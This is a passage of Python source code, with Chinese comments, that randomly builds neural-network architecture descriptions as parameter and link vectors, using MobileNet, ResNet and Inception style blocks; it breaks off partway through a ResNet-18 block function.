params = last_block_input_size + output_size + pooling_params
self.layer_parameters += params #加入参数向量中
link_list = [self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [7] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
else:
#生成全连接层
# 几率加入avgpool ,reshape为 [1,channel,1,1]
if random.randint(0,10)<3:
pooling_params = [last_block_input_size[2],last_block_input_size[2], 1,1, 0,0, 1,1, 1]
params = last_block_input_size + [0,0,0,0] + pooling_params
output_size = self.get_output_size(params,7,last_block_input_size)
params = last_block_input_size + output_size + pooling_params
self.layer_parameters += params #加入参数向量中
link_list = [self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [7] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
last_block_input_size = last_layer_input_size
#加入全连接层
input_length = last_block_input_size[1] * last_block_input_size[2] * last_block_input_size[3]
params = self.make_layer(21,[1,input_length],[1,1000])
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # 加入层id列表中
self.layer_num += 1
def make_block(self,input_size,output_size,last_block_index,max_branch_layer,branch_prob = 0.1):
'''
input_size接收上一层输入的尺寸
output_size输出尺寸
max_branch_layer每一个分支最多的层数
生成一个神经网络块,该块中的层只与块中的其他层有联系,不与其他块有联系,块中不包含FC层。
规则:
①卷积层、批标准化、激活层、池化层一般遵循如下顺序:
nn.Conv2d(1, 6, 3, padding=1),
nn.BatchNorm2d(6),
nn.ReLU(True),
nn.MaxPool2d(2, 2)
但是前后可以接多个Conv,Pool
②如果是concat,channel可以不一样。如果是add,所有shape都要一样。
branch_prob表示生成一个分支的概率为branch_prob,生成两个为branch_prob*branch_prob,以此类推
'''
in_channel,in_height = input_size[1],input_size[2]
out_height = output_size[2]
#print(input_size,output_size)
if in_height == 224:
choose = 0
if out_height == 112:
choose = 11
return_index,out_size = self.make_conv_bn(last_block_index,input_size,output_size)
elif out_height == 56:
if random.randint(0,100) < 50:
choose = 21
return_index,out_size = self.make_inceptionV1_pre(last_block_index,input_size,output_size)
else:
choose = 22
return_index,out_size = self.make_resnet_pre(last_block_index,input_size,output_size)
# print('==out_height:',choose)
elif out_height == in_height:
choose = random.randint(0,96)
# if choose > 48 and choose < 64 and in_channel > 192:
# choose = choose - 16
# print(1,choose)
if choose < 16:
choose = 1
return_index,out_size = self.make_conv_dw(last_block_index,input_size,output_size)
elif choose < 32:
choose = 2
return_index,out_size = self.make_InversedResidual(last_block_index,input_size,output_size)
elif choose < 48:
choose = 3
return_index,out_size = self.make_resnet18_block(last_block_index,input_size,output_size)
elif choose < 64:
choose = 4
return_index,out_size = self.make_MobileNetV3_block(last_block_index,input_size,output_size)
elif choose < 80:
choose = 5
return_index,out_size = self.make_resnet50_block(last_block_index,input_size,output_size)
else:
choose = 6
return_index,out_size = self.make_inceptionV1_block(last_block_index,input_size,output_size)
# print('==choose:',choose)
elif in_height == 2*out_height:
choose = random.randint(0,112)
# if choose > 80 and in_channel < 192:
# choose = choose - 16
# if choose > 64 and choose < 80 and in_channel > 192:
# choose = choose - 16
# print(2,choose)
if choose < 16:
choose = 1
return_index,out_size = self.make_conv_dw(last_block_index,input_size,output_size)
elif choose < 32:
choose = 2
return_index,out_size = self.make_InversedResidual(last_block_index,input_size,output_size)
elif choose < 48:
choose = 3
return_index,out_size = self.make_resnet18_block(last_block_index,input_size,output_size)
elif choose < 64:
choose = 4
return_index,out_size = self.make_MobileNetV3_block(last_block_index,input_size,output_size)
elif choose < 80:
choose = 5
return_index,out_size = self.make_inceptionV1_block2(last_block_index,input_size,output_size)
elif choose < 96:
choose = 6
return_index,out_size = self.make_resnet50_block(last_block_index,input_size,output_size)
else :
choose = 7
return_index,out_size = self.make_inceptionV1_block(last_block_index,input_size,output_size)
# print('2*choose:',choose)
return self.layer_num - 1,out_size #返回块输出元素
def make_conv_bn(self,last_block_index,input_size,final_output_size):
'''
实现MobileNet-v1 中第一层的标准卷积
#nn.Conv2d(inp,oup,kernel_size=3,stride = 2,padding=1,bias = False),
#nn.BatchNorm2d(oup),
#nn.ReLU(inplace = True))
Input_h = 2* Output_h
'''
last_layer_input_size = input_size
#加入 #1 conv2d
in_channel = input_size[1]
out_channel = random.randint(32,48)
conv_params = [in_channel,out_channel, 3,3, 2,2, 1,1, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 #3 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#print('make_conv_bn',last_layer_input_size)
return self.layer_num - 1, last_layer_input_size #返回该线性序列的最后一个节点的索引号
def make_conv_dw(self,last_block_index,input_size,final_output_size):
'''
实现MobileNet-v1 中的深度卷积
stride = 1 → Input_h = Output_h
stride = 2 → Input_h = 2*Output_h
#nn.Conv2d(inp,inp,kernel_size=3,stride=1&2,padding=1,groups = inp,bias = False),
#nn.BatchNorm2d(inp),
#nn.ReLU(inplace = True),
#nn.Conv2d(inp,oup,kernel_size=1,stride=1,padding=0,bias = False),
#nn.BatchNorm2d(oup),
#nn.ReLU(inplace = True)
Input_h = 2 * Output_h
'''
last_layer_input_size = input_size
in_channel,in_height = input_size[1],input_size[2]
out_channel = random.randint(in_channel,in_channel*2)
if out_channel > 1000:
out_channel = self.prob_random([int(in_channel/2),int(in_channel/3)],[0.8,0.2])
#加入 #1 conv2d
out_height = final_output_size[2]
if in_height == out_height:
stride = 1
elif in_height == 2 *out_height:
stride = 2
else:
print('wrong')
conv_params = [in_channel,in_channel, 3,3, stride,stride, 1,1, 1,1, in_channel]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 #3 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 #4 conv2d
conv_params = [in_channel,out_channel, 1,1, 1,1, 0,0, 1,1, 1]
params = last_layer_input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,last_layer_input_size)
params = last_layer_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #5 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 #6 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#print('make_conv_dw',last_layer_input_size)
return self.layer_num - 1,last_layer_input_size #返回该线性序列的最后一个节点的索引号
def make_InversedResidual(self,last_block_index,input_size,final_output_size):
'''
已改
out_channel < 400可用
实现MobileNet-v2 中的InversedResidual
stride = 2 → Input_h = 2*Output_h
#nn.Conv2d(inp, inp, kernel_size=3, stride=2, padding=1, groups=inp, bias=False),
#nn.BatchNorm2d(inp),
#nn.ReLU6(inplace=True),
#nn.Conv2d(inp, oup, kernel_size=1, stride=1, padding=0, bias=False),
#nn.BatchNorm2d(oup),
stride = 1 → Input_h = Output_h
#nn.Conv2d(inp, hidden_dim, kernel_size=1, stride=1, padding=0, bias=False),
#nn.BatchNorm2d(hidden_dim),
#nn.ReLU6(inplace=True),
#nn.Conv2d(hidden_dim, hidden_dim, kernel_size=3, stride=1, padding=1, groups=hidden_dim, bias=False),
#nn.BatchNorm2d(hidden_dim),
#nn.ReLU6(inplace=True),
#nn.Conv2d(hidden_dim, oup, kernel_size=1, stride=1, padding=0, bias=False),
#nn.BatchNorm2d(oup),
'''
last_layer_input_size = input_size
in_channel,in_height = input_size[1],input_size[2]
out_channel = random.randint(in_channel,in_channel*2)
if out_channel > 1000:
out_channel = self.prob_random([int(in_channel/2),int(in_channel/3)],[0.8,0.2])
out_height = final_output_size[2]
if in_height == out_height:
stride = 1
#加入 #1 conv2d
res = self.layer_num - 1
hidden_dim = in_channel * 6
if hidden_dim > 1000:
hidden_dim = in_channel * 3
conv_params = [in_channel,hidden_dim, 1,1, 1,1, 0,0, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 #3 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 #4 conv2d
conv_params = [hidden_dim,hidden_dim, 3,3, 1,1, 1,1, 1,1, hidden_dim]
params = last_layer_input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,last_layer_input_size)
params = last_layer_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #5 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 #6 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 #7 conv2d
conv_params = [hidden_dim,out_channel, 1,1, 1,1, 0,0, 1,1, 1]
params = last_layer_input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,last_layer_input_size)
params = last_layer_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #8 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入残差连接
if in_channel == out_channel :
add_index_list = [res,self.layer_num-1]
params = self.make_layer(24,last_layer_input_size,add_num=len(add_index_list))
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(add_index_list,self.layer_num)
self.layer_id += [24] # 加入层id列表中
self.layer_num += 1
elif in_height == 2 *out_height:
stride = 2
#加入 #1 conv2d
conv_params = [in_channel,in_channel, 3,3, stride,stride, 1,1, 1,1, in_channel]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 #3 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 #4 conv2d
conv_params = [in_channel,out_channel, 1,1, 1,1, 0,0, 1,1, 1]
params = last_layer_input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,last_layer_input_size)
params = last_layer_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #5 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
else:
print('wrong')
#print('make_InversedResidual',last_layer_input_size)
return self.layer_num - 1,last_layer_input_size #返回该线性序列的最后一个节点的索引号
def make_MobileNetV3_block(self,last_block_index,input_size,final_output_size):
'''
IN = 2 OUT
(conv): Sequential(
(0): Conv2d(16, 16, kernel_size=(1, 1), stride=(1, 1), bias=False)
(1): BatchNorm2d(16, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU(inplace=True)
(3): Conv2d(16, 16, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), groups=16, bias=False)
(4): BatchNorm2d(16, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(5): SEModule(
(avg_pool): AdaptiveAvgPool2d(output_size=1)
(fc): Sequential(
(0): Linear(in_features=16, out_features=4, bias=False)
(1): ReLU(inplace=True)
(2): Linear(in_features=4, out_features=16, bias=False)
(3): Hsigmoid()
)
)
(6): ReLU(inplace=True)
(7): Conv2d(16, 16, kernel_size=(1, 1), stride=(1, 1), bias=False)
(8): BatchNorm2d(16, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
IN = OUT
(conv): Sequential(
(0): Conv2d(24, 88, kernel_size=(1, 1), stride=(1, 1), bias=False)
(1): BatchNorm2d(88, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU(inplace=True)
(3): Conv2d(88, 88, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), groups=88, bias=False)
(4): BatchNorm2d(88, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(5): Identity()
(6): ReLU(inplace=True)
(7): Conv2d(88, 24, kernel_size=(1, 1), stride=(1, 1), bias=False)
(8): BatchNorm2d(24, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
'''
last_layer_input_size = input_size
in_channel,in_height = input_size[1],input_size[2]
if random.randint(0,100) < 20:
out_channel = int(in_channel*2)
else:
out_channel = random.randint(in_channel,int(in_channel*1.5))
if out_channel > 1000:
out_channel = self.prob_random([int(in_channel/2),int(in_channel/3)],[0.8,0.2])
out_height = final_output_size[2]
hidden_dim = random.randint(in_channel*3,in_channel*6)
if hidden_dim > 1000:
hidden_dim = in_channel
if in_height == out_height:
stride = 1
#加入 #1 conv2d
res = self.layer_num - 1
conv_params = [in_channel,hidden_dim, 1,1, 1,1, 0,0, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 #3 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 #4 conv2d
conv_params = [hidden_dim,hidden_dim, 3,3, 1,1, 1,1, 1,1, hidden_dim]
params = last_layer_input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,last_layer_input_size)
params = last_layer_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #5 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
before_le_input_size = last_layer_input_size
before_le = self.layer_num - 1
#加入 SEModule
if random.randint(0,100)<50:
#加入 Avgpool
kernel_size = last_layer_input_size[2]
pooling_params = [kernel_size,kernel_size, 1,1, 0,0, 1,1, 1]
params = last_layer_input_size + [0,0,0,0] + pooling_params
output_size = self.get_output_size(params,7,last_layer_input_size)
params = last_layer_input_size + output_size + pooling_params
self.layer_parameters += params #加入参数向量中
link_list = [self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [7] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 Linear
linear_hidden = int(hidden_dim/4)
input_length = last_layer_input_size[1] * last_layer_input_size[2] * last_layer_input_size[3]
params = self.make_layer(21,[1,input_length],[1,linear_hidden])
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # 加入层id列表中
self.layer_num += 1
#加入ReLU
length = linear_hidden
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 Linear
params = self.make_layer(21,[1,linear_hidden],[1,hidden_dim])
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # 加入层id列表中
self.layer_num += 1
#加入Sigmoid
length = hidden_dim
params = [1,hidden_dim] + [1,0,0,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 #6 ReLU
length = before_le_input_size[1]
for i in range(2,len(before_le_input_size)):
length *= before_le_input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[before_le]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 #7 conv2d
conv_params = [hidden_dim,out_channel, 1,1, 1,1, 0,0, 1,1, 1]
params = before_le_input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,before_le_input_size)
params = before_le_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #8 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入残差连接
if in_channel == out_channel :
add_index_list = [res,self.layer_num-1]
params = self.make_layer(24,last_layer_input_size,add_num=len(add_index_list))
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(add_index_list,self.layer_num)
self.layer_id += [24] # 加入层id列表中
self.layer_num += 1
elif in_height == 2 *out_height:
stride = 2
#加入 #1 conv2d
conv_params = [in_channel,hidden_dim, 1,1, 1,1, 0,0, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 #3 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 #4 conv2d
conv_params = [hidden_dim,hidden_dim, 3,3, 2,2, 1,1, 1,1, hidden_dim]
params = last_layer_input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,last_layer_input_size)
params = last_layer_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #5 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
before_le_input_size = last_layer_input_size
before_le = self.layer_num - 1
#加入 SEModule
if random.randint(0,100)<50:
#加入 Avgpool
kernel_size = last_layer_input_size[2]
pooling_params = [kernel_size,kernel_size, 1,1, 0,0, 1,1, 1]
params = last_layer_input_size + [0,0,0,0] + pooling_params
output_size = self.get_output_size(params,7,last_layer_input_size)
params = last_layer_input_size + output_size + pooling_params
self.layer_parameters += params #加入参数向量中
link_list = [self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [7] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 Linear
linear_hidden = int(hidden_dim/4)
input_length = last_layer_input_size[1] * last_layer_input_size[2] * last_layer_input_size[3]
params = self.make_layer(21,[1,input_length],[1,linear_hidden])
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # 加入层id列表中
self.layer_num += 1
#加入ReLU
length = linear_hidden
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 Linear
params = self.make_layer(21,[1,linear_hidden],[1,hidden_dim])
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # 加入层id列表中
self.layer_num += 1
#加入Sigmoid
length = hidden_dim
params = [1,hidden_dim] + [1,0,0,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 #6 ReLU
length = before_le_input_size[1]
for i in range(2,len(before_le_input_size)):
length *= before_le_input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[before_le]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 #7 conv2d
conv_params = [hidden_dim,out_channel, 1,1, 1,1, 0,0, 1,1, 1]
params = before_le_input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,before_le_input_size)
params = before_le_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #8 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
else:
print('wrong')
#print('make_InversedResidual',last_layer_input_size)
return self.layer_num - 1,last_layer_input_size #返回该线性序列的最后一个节点的索引号
def make_resnet_pre(self,last_block_index,input_size,final_output_size):
'''
实现ResNet最初的pre层
(0): Conv2d(3, hidden, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3))
(1): BatchNorm2d(hidden)
(2): ReLU(inplace=True)
(3): MaxPool2d(kernel_size=3, stride=2, padding=1, dilation=1)
out:torch.Size([1, 64, 56, 56])
'''
last_layer_input_size = input_size
#加入 #1 conv2d
in_channel = input_size[1]
out_channel = 64
conv_params = [in_channel,out_channel, 7,7, 2,2, 3,3, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 #3 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 #4 pooling
pooling_params = [3,3, 2,2, 1,1, 1,1, 0]
params = last_layer_input_size + [0,0,0,0] + pooling_params
output_size = self.get_output_size(params,7,last_layer_input_size)
params = last_layer_input_size + output_size + pooling_params
self.layer_parameters += params #加入参数向量中
link_list = [self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [7] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#('resnetpre',last_layer_input_size)
return self.layer_num - 1,last_layer_input_size #返回该线性序列的最后一个节点的索引号
def make_resnet18_block(self,last_block_index,input_size,final_output_size):
'''
Resnet 残差模块,包括左右两部分
stride=2 → in_height == 2*out_height 包括左右两部分
(left): Sequential(
(0): Conv2d(inp, otp, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(1): BatchNorm2d(otp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU(inplace=True)
(3): Conv2d(otp, otp, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(4): BatchNorm2d(otp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
(right): Sequential(
(0): Conv2d(inp, otp, kernel_size=(1, 1), stride=(2, 2), bias=False)
(1): BatchNorm2d(otp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU()
stride=1 → in_height == out_height 包括左
(left): Sequential(
(0): Conv2d(inp, inp, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(1): BatchNorm2d(inp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU(inplace=True)
(3): Conv2d(inp, inp, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(4): BatchNorm2d(inp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
#可无
(right): Sequential(
(0): Conv2d(inp, inp, kernel_size=(1, 1), stride=(1, 1), bias=False)
(1): BatchNorm2d(otp, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU()
)
(relu): ReLU(inplace=True)
'''
in_channel,in_height = input_size[1],input_size[2]
out_channel = self.prob_random([in_channel,int(in_channel*2)],[0.8,0.2])
